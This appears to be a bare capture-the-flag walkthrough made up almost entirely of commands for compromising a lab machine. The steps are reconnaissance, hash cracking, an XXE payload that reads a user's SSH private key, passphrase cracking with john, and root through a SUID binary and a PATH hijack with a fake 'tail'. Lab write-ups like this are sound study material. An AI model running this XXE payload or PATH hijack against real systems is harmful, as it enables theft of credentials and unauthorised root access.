1 - nmap -A -p- 10.10.162.125
2 - gobuster dir -u http://10.10.162.125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3 - wget http://10.10.162.125/custom/js/users.bak -> crackstation
4 - http://10.10.162.125:8765/home.php
5 - view-source:http://10.10.162.125:8765/auth/dontforget.bak
6 - XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ELEMENT data ANY > <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <name>&name;</name>
  <author>b</author>
  <com>c</com>
</comment>

7 - chmod 600 id_rsa
8 - ssh2john id_rsa > hash
9 - john hash -w=/usr/share/wordlists/rockyou.txt
10 - ssh -i id_rsa barry@10.10.162.125
11 - cat user.txt
12 - find / -perm -u=s -type f 2>/dev/null
13 - string /home/joe/live_log
14 - echo "/bin/bash" > tail
15 - chmod 777 tail
16 - export PATH=/home/barry:$PATH
17 - /home/joe/live_log
18 - cat /root/root.txt

